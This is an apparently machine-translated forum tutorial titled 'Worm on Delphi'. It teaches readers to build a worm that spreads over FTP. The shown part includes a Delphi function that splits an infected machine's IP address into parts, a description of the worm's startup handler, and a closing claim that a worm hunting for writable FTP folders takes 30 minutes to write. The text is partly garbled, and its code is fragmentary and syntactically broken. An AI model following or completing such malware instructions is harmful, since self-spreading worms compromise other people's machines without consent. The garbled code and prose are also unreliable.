Worm on Delphi


11 yrs. 7 mth. 7 days
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Create a new project. Just post on the form component NMFTP (so called, with no one.)
then you need to declare two global variables.
This is done after the line var, which comes after the line

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This function will determine the IP infected cars and return it to us in the form of a string.
then need to share their IP to 4 chasti.napishem a function and call it CutIP (cut IP). Here's the code:
function CutIP (IP: string): string; / / functions will be transferred to the ip-address as a string
/ / Declare two numerical variables - pos1 and count
pos1, count: Integer;
/ / Declare a string variable Piece
Piece: string;
/ / first IP number
Piece: = IP;
/ / assign to a variable piece variable ip (which is passed
/ / as the main parameter of the function
/ / Then put their Pos1 variable that denotes the number
/ / number of characters to the first point in the variable piece (there is our IP)
pos1: = Pos ('.', Piece);
/ / then remove from the line piece 30 characters after the first point
/ / in the end we are left with only the first day of the ip-address
Delete ( piece, pos1, 30)
/ / we put their variable ip1st
ip1st: = Piece;
/ / Then everything goes in the same way
/ / second number IP
Piece: = IP;
pos1: = Pos ('.', Piece);
Delete (Piece, 1, pos1);
pos1: = Pos ('.', Piece);
Delete (Piece, pos1, 30);
ip2nd: = Piece;
Now the first two numbers of IP-address of the infected machine is broken into 2 parts and inserted into the two variables.
All, all the needed functions unsubscribed. Now create the OnCreate event handler of the main form. Here is what should happen when you start a worm. Here comes the fun part:
First, assign multiple variables of different types, for this to begin write:

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If you head to work, it can be 30 minutes to write a worm that also finds all folders on FTP, which allows recording.
Good luck!
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